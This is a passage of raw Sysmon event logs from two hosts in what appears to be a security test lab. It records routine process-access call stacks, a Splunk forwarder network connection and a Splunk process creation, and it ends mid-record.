12:17:28.170{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.170{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.169{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.169{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.169{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E358-63C7-0006-00000000AF02}5736C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.169{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E358-63C7-0006-00000000AF02}5736C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|c:\windows\system32\UBPM.dll+a731|c:\windows\system32\UBPM.dll+f954|c:\windows\system32\UBPM.dll+cd5c|c:\windows\system32\UBPM.dll+d325|c:\windows\system32\UBPM.dll+dc25|c:\windows\system32\UBPM.dll+e8fd|c:\windows\system32\UBPM.dll+e034|c:\windows\system32\UBPM.dll+11582|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.167{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.167{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000039901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:25.562{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56228-false10.0.1.12-8000- 10341000x800000000000000015227Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E359-63C7-E101-00000000B002}3204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015226Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015225Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015224Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015223Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015222Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015221Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015220Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015219Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015218Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015217Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E359-63C7-E101-00000000B002}3204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015216Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.861{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E359-63C7-E101-00000000B002}3204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015215Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.862{E5A8D418-E359-63C7-E101-00000000B002}3204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015214Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.238{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9A36766E75C2967EC49B7A36C64E16,SHA256=AEAF6557D312372B7106590A29755E6A415589C1C2E466726891959C4EB51642,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015213Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.193{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E359-63C7-E001-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015212Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.191{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015211Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015210Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:29.190{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015209Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 